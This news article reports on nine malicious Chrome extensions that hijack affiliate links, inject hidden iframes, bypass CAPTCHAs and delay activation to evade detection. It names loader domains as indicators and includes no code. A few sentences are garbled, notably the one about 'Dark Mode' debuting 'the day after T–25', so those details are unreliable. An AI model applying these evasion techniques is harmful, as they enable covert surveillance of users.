Cybersecurity researchers have recently discovered nine different malicious Chrome extensions that together have over 50,000 downloads. These extensions can hijack affiliate links and track all of a user’s web activity. They remove security headers, which can cause major privacy and security violations for users. These discovered extensions had well-known names, including “Free VPN,” “Screenshot,” and “Weather (weather-best-forecast).”
The attack chain begins when a seemingly benign logo file is downloaded when first loading one of the malicious extensions. Once active, these extensions can inject hidden iframes to connect to URLs from attacker-controlled servers. Importantly, they do all this while circumventing CAPTCHA hurdles, which are often used to block spammy bot behavior. This vast ability to surveil has alarming potential for misuse.
How the Malware Operates
The threat actors behind the malicious extensions employ a highly obfuscated technique to escape full detection and lie dormant for long periods of time. They build in time-based delays that keep the malware from starting up until over a week after it’s been installed. This tactic makes it even harder to find and remove the malicious code completely and quickly.
Plus, the malware doesn’t even download its payload about 90% of the time. The loader in the malicious code calls out to external servers. More specifically it reaches out to “www.liveupdt.com” or “www.dealctr.com” to download the initial payload. It waits 48 hours before each try to reach out to these servers. This latency further complicates the ability of security systems to identify the emerging threat in real-time.
“Why would malware need to bypass CAPTCHAs? Because some of its operations, like the hidden iframe injections, trigger bot detection.” – Lotan Sery and Noga Gouldman
The code in the extensions then reads the active tab’s content and looks for markers containing the “===” sign. It leverages these markers to reverse engineer JavaScript code required for its malicious activities.
Extension List and Potential Risks
The Add-ons blocklist contains every compromised extension as well as several other extensions commonly downloaded by users. Along with “Free VPN,” “Screenshot,” and “Weather (weather-best-forecast),” other identified extensions include “Cache – Fast site loader,” “Free MP3 Downloader,” and various Google Translate variants such as “Google Translate (google-translate-right-clicks)” and “Translator – Google Bing Baidu DeepL.” The most venerable of these features, “Dark Mode,” debuted the day after T–25, on October 25, 2024. For example, it allows users to enable a dark theme for all sites.
The consequences of using these extensions go far beyond simple hassle. By monitoring user behavior and stealing affiliate links, they are a significant risk to consumer privacy.
“Free VPNs promise privacy, but nothing in life comes free.” – Koi Security
It’s not a surprise that as consumers continue to use these seemingly innocuous tools, they become the unwitting guinea pigs subjected to data breaches and invasive surveillance.